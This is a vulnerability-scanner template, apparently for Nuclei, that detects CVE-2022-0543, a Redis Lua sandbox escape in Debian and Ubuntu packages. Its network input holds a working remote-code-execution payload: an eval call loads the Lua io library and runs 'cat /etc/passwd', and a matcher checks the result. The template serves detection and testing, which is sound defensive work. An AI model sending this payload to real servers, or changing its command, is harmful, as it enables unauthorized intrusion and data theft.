id: CVE-2022-0543 info: name: Redis Sandbox Escape - Remote Code Execution author: dwisiswant0 severity: critical description: | This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://bugs.debian.org/1005787 - https://www.debian.org/security/2022/dsa-5081 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-0543 metadata: shodan-query: redis_version tags: cve,cve2022,network,redis,unauth,rce network: - inputs: - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" host: - "{{Hostname}}" - "{{Host}}:6379" read-size: 64 matchers: - type: regex regex: - "root:.*:0:0:" # Enhanced by mp on 2022/05/18